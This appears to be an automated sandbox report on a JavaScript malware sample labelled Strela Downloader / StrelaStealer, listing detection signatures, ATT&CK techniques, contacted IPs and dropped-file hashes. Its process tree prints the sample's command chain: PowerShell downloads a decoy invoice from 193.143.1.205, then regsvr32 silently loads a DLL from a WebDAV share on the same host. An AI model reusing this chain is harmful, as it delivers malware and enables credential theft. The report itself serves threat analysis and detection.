Windows
Analysis Report
89131879533771361.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 2448 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\89131 8795337713 61.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 4016 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\167 3338721669 .dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3164 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4568 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 4196 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 2136 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 6900 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 36 --field -trial-han dle=1628,i ,189607110 7334450595 ,629805710 4244382676 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 2448 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
4% | Virustotal | Browse | ||
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589034 |
Start date and time: | 2025-01-11 08:42:52 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 89131879533771361.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/63@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 172.64.41.3, 162.159.61.3, 34.237.241.83, 18.213.11.84, 50.16.47.176, 54.224.241.105, 2.23.242.162, 23.209.209.135, 199.232.214.172, 2.16.168.107, 2.16.168.105, 23.200.0.33, 23.200.0.21, 192.168.2.6, 13.107.246.45, 20.109.210.53, 23.47.168.24
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
02:43:47 | API Interceptor | |
02:43:50 | API Interceptor | |
02:43:51 | API Interceptor | |
02:43:58 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263122645532267 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0c:9JZj5MiKNnNhoxuV |
MD5: | 253A89810E037DE30D774F744EB5A49D |
SHA1: | 9DABAF78765A95507D800A6F7397A6EECF3A026D |
SHA-256: | 6FAFA91D4156333F36D22BD0A729898490E9D3867A05779EC1CE8B9AAFBA0D0D |
SHA-512: | CD45D4B8D3AF07E889DB0F5D91CD3E3F695445BE2652D78F6340A42E59FED40655DFC6168E1DA2DA4F17FCFE6952524DAD554F1D2E9A54D78DBD4944555B41B5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7555350106458046 |
Encrypted: | false |
SSDEEP: | 1536:1SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:1azaSvGJzYj2UlmOlOL |
MD5: | B7A790DA833C05A12FE65C670F39B952 |
SHA1: | 7C75E8DC4ADF485DEE8E35624B67896C6C3FE90D |
SHA-256: | AE6E570B7018071AABD34050103FE8567FC06146DBA1CD0035F630210FA4197F |
SHA-512: | ABC6F4049DB0C088A40C9AF4CBC280698F44AFBA0F0B9D9DA6A8E1754DE146EDC7538B53A11D7304C8748A016B51547A33BB185C023B7A7F12EF468A02376176 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.0780851019391901 |
Encrypted: | false |
SSDEEP: | 3:MOKYeh8kY6l3EefNaAPaU1lCW8kXllltalluxmO+l/SNxOf:MOKzh110ENDPaUX1QgmOH |
MD5: | CBFF5C775F204A094D71132B762B7B4A |
SHA1: | 4F3AA529EA056E36AC9385BABF81A8CA5580D5B0 |
